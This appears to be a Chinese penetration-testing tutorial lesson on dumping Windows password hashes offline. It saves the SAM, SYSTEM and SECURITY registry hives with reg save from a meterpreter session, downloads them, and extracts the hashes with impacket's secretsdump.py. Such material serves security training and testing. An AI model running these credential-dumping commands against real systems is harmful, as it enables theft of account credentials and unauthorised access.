# 第五十六课：离线提取目标机hash

很多环境下，不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。

在 meterpreter shell 命令切到交互式 cmd 命令。\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqZwCb3fJQuzQbz9%2F647ac3d1d83b7d7711b2cfd0ce18f1d5.jpg?generation=1551060454473655\&alt=media)

reg save 方式使得需要下载的目标机hash文件更小。

* reg save HKLM\SYSTEM sys.hiv  
* reg save HKLM\SAM sam.hiv  
* reg save hklm\security security.hiv  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqZyPkJcrF9MMzfN%2Fcebaa1fc93231bc1aaf7738c222b5ac6.jpg?generation=1551060442186196\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_-tzd5-w56bVyj%2Ff2dc08a2bd64fc29ec0189933b4442dc.jpg?generation=1551060435460219\&alt=media)

meterpreter下自带download功能。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_1mGdSy2oNFNJR%2F336cd95e4be157c266efcd04d9ddc064.jpg?generation=1551060433395071\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_3fjfz7O6g0WpG%2F3f2d037ed7ac0197c01e95b7651fad41.jpg?generation=1551060430958673\&alt=media)

## 离线提取：

本季用到的是 impacket 的 secretsdump.py。Kali默认路径：`/root/impacket/examples/secretsdump.py`

**命令如下：**

```bash
root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_506iVMWINparZ%2Fced7254cc160ced11f2f3f512df53aec.jpg?generation=1551060449500525\&alt=media)

> Micropoor